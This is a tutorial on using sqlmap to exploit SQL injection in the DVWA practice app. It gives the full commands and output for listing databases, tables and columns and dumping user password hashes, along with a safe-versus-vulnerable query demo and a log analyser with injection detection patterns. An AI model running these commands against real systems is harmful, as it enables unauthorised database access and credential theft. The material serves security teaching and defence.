Automate SQL Injection Exploitation with SqlMap - DVWA
What is a SQL Injection?
SQL injection is a technique often used to attack data-driven applications. It is considered a high-risk vulnerability because it can lead to full compromise of the web application, which is why almost every web application penetration testing engagement checks the application for SQL injection flaws.
A simple, general definition: an application is vulnerable to SQL injection when input supplied by a user can alter the queries the application executes against its database.
This is done by passing crafted parameters or statements as input (for example through an HTML form) so that the website sends a newly formed SQL command to the database (e.g., one that dumps the database contents to the attacker). SQL injection is a code injection technique that exploits a vulnerability in a web application's code. The vulnerability arises when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements, or is not strongly typed and is therefore executed unexpectedly. SQL injection is best known as an attack vector against websites, but it can be used against any type of SQL database.
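The two failure modes named above (unfiltered string literals and untyped input) are easiest to see side by side. The following is an added example, not code from the original post or from DVWA: a Python/sqlite3 stand-in for DVWA's `id` lookup against a constructed `users` table. `lookup_user_vulnerable` concatenates the parameter into the SQL string, so a tautology in the parameter changes the query; `lookup_user_safe` enforces the integer type and binds the value as a parameter, so the same input never reaches the SQL parser. All names and rows are constructed for the demo.

```python
import re
import sqlite3

# Constructed sample rows modelled on the dvwa.users columns shown later in the post.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin"),
    (2, "gordonb", "Gordon", "Brown"),
    (3, "pablo", "Pablo", "Picasso"),
    (4, "smithy", "Bob", "Smith"),
]


def demo_db():
    """Build an in-memory database with a small users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, "
        "first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_user_vulnerable(id_param, conn=None):
    """Vulnerable pattern: the request parameter is spliced into the SQL text.

    Whatever the client sends becomes part of the statement, so a quote in
    id_param closes the literal and the rest is interpreted as SQL.
    """
    conn = conn or demo_db()
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{id_param}'"
    return conn.execute(query).fetchall()


def lookup_user_safe(id_param, conn=None):
    """Hardened pattern: validate the type, then bind the value as a parameter.

    The id is only ever passed to the driver as data, never as SQL text, so the
    database engine cannot mistake it for part of the statement.
    """
    conn = conn or demo_db()
    if not isinstance(id_param, str) or not re.fullmatch(r"[0-9]+", id_param):
        return []  # reject anything that is not a plain decimal id
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?",
        (int(id_param),),
    ).fetchall()


if __name__ == "__main__":
    benign = "1"
    tautology = "1' OR '1'='1"  # classic test input: closes the literal, appends OR
    print("vulnerable, id=1          :", lookup_user_vulnerable(benign))
    print("vulnerable, tautology     :", lookup_user_vulnerable(tautology))
    print("safe, id=1                :", lookup_user_safe(benign))
    print("safe, tautology (rejected):", lookup_user_safe(tautology))
```

Run it and compare the second and fourth lines: the concatenated query returns every row in the table, while the parameterised version returns nothing for the same input. The fix is the combination of both controls; binding alone is enough to stop the injection, and the type check additionally keeps malformed ids out of the application logic and the logs.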
What is sqlmap?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
In this post our target is the DVWA web application. You can download it from the following link:
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the processes of securing web applications, and to aid teachers and students in teaching and learning web application security in a classroom environment.
Obtain Database Data For DVWA
Notes:
1. Obtain the target URL (the Referer link) using BurpSuite's Intruder tool; it is placed after the "-u" option.
2. Obtain the cookie line containing PHPSESSID using BurpSuite's Intruder tool; it is placed after the "--cookie" option.
3. In the URL, replace 192.168.1.104 with the IP address of the system on which DVWA is running.
4. Install and configure Python and sqlmap on your system.
STEP-1: Run sqlmap with the appropriate options and obtain a list of all databases
$ sudo sqlmap -u "http://192.168.1.104/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=i7a765ku9dkg6usjtpu16lbd36; security=low" --dbs
Where --dbs lists all databases on the database server
The statement above retrieved all the databases of the MySQL server:
fetching database names
[*] bwapp
[*] cssm
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
STEP-2: Fetch the list of tables for a database, e.g. 'dvwa'
$ sudo sqlmap -u "http://192.168.1.104/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=i7a765ku9dkg6usjtpu16lbd36; security=low" -D dvwa --tables
Where -D <specific database name>
--tables lists all tables of the specified database
fetching tables for database: 'dvwa'
Database: dvwa
+------------+
| guestbook |
| users |
+------------+
STEP-3: Fetch the columns of table 'users' in database 'dvwa'
$ sudo sqlmap -u "http://192.168.1.104/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=i7a765ku9dkg6usjtpu16lbd36; security=low" -D dvwa -T users --columns
Where -D <specific database name>
-T <specific table name>
--columns lists all column names of the specified table in the specified database
Database: dvwa
Table: users
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| user | varchar(15) |
| avatar | varchar(70) |
| failed_login | int(3) |
| first_name | varchar(15) |
| last_login | timestamp |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+--------------+--------------+
STEP-4: Obtain users and their passwords from table dvwa.users
$ sudo sqlmap -u "http://192.168.1.104/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=i7a765ku9dkg6usjtpu16lbd36; security=low" -D dvwa -T users -C user,password --dump
Where -D <specific database name>
-T <specific table name>
-C <columnname1,columnname2,...> selects the columns whose data is fetched
--dump retrieves the data and writes it to sqlmap's dump file
+--------------+-------------------------------------------+
| User | Password |
+--------------+-------------------------------------------+
| admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| gordonb | e99a18c428cb38d5f260853678922e03 |
| pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 |
| smithy | 5f4dcc3b5aa765d61d8327deb882cf99 |
+--------------+-------------------------------------------+
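Each of the four steps above makes sqlmap send many requests to the same URL with the `id` parameter rewritten, so the enumeration leaves a recognisable trail in the web server's access log. The following is an added example from the defender's side, not part of the original post or of sqlmap: a small Python analyser for combined-format access logs that flags requests by the sqlmap default User-Agent (it identifies itself as `sqlmap/<version>` unless the operator overrides it), by injection-style content in the decoded query string, and by bursts of requests from one client to one path. The log lines, IP addresses, timestamps, and the exact User-Agent string are constructed for the demo; the pattern list is a starting point, not an exhaustive signature set.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Query-string constructs that rarely occur in a legitimate numeric id parameter.
# Each pattern is checked against the URL-decoded query string.
PAYLOAD_PATTERNS = [
    ("union-select", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("time-delay", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    # quote, then AND/OR, then a comparison inside the same parameter value
    ("tautology", re.compile(r"'\s*(and|or)\s+[^=&]*=", re.I)),
    ("schema-probe", re.compile(r"information_schema", re.I)),
    ("sql-comment", re.compile(r"(--|#|/\*)")),
]

# Constructed sample log: one benign client, then four requests in the style
# of an automated scanner against the DVWA sqli page from the post.
SAMPLE_LOG = [
    '192.168.1.20 - - [10/Oct/2023:13:55:36 +0000] "GET /DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4523 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2023:13:57:01 +0000] "GET /DVWA-master/vulnerabilities/sqli/?id=1%27%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 4523 "-" "sqlmap/1.x-stable (https://sqlmap.org)"',
    '192.168.1.50 - - [10/Oct/2023:13:57:02 +0000] "GET /DVWA-master/vulnerabilities/sqli/?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20-&Submit=Submit HTTP/1.1" 200 4611 "-" "sqlmap/1.x-stable (https://sqlmap.org)"',
    '192.168.1.50 - - [10/Oct/2023:13:57:08 +0000] "GET /DVWA-master/vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29--%20-&Submit=Submit HTTP/1.1" 200 4523 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2023:13:57:09 +0000] "GET /DVWA-master/vulnerabilities/sqli/?id=1%27%20AND%20%27a%27%3D%27a&Submit=Submit HTTP/1.1" 200 4523 "-" "sqlmap/1.x-stable (https://sqlmap.org)"',
]


def parse_line(line):
    """Parse one combined-format line; return a dict or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = unquote_plus(url.query)  # decode %27, %20, + etc. before matching
    return rec


def flag_request(rec):
    """Return the list of reasons a parsed request looks like SQL injection probing."""
    reasons = []
    if "sqlmap" in rec["ua"].lower():
        reasons.append("ua:sqlmap")
    for name, pattern in PAYLOAD_PATTERNS:
        if pattern.search(rec["query"]):
            reasons.append("payload:" + name)
    return reasons


def analyze_access_log(lines, burst_threshold=5):
    """Scan log lines; return (flagged requests, (ip, path) pairs over the burst threshold)."""
    findings = []
    per_client_path = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        per_client_path[(rec["ip"], rec["path"])] += 1
        reasons = flag_request(rec)
        if reasons:
            findings.append({"ip": rec["ip"], "path": rec["path"],
                             "query": rec["query"], "reasons": reasons})
    bursts = {key: n for key, n in per_client_path.items() if n >= burst_threshold}
    return findings, bursts


if __name__ == "__main__":
    findings, bursts = analyze_access_log(SAMPLE_LOG, burst_threshold=4)
    for f in findings:
        print(f"{f['ip']} {f['path']} {f['reasons']}  query={f['query']!r}")
    for (ip, path), n in bursts.items():
        print(f"burst: {n} requests from {ip} to {path}")
```

Two of the sample lines use a browser-like User-Agent, which is what an operator who overrides the default would produce; those are still caught by the payload patterns and by the per-client request count, which is the signal that survives even when every payload is novel. In production the threshold would be tuned per endpoint, and the real response to these findings (on the DVWA page, or any page built the same way) is the parameterised query shown earlier, not the log rule.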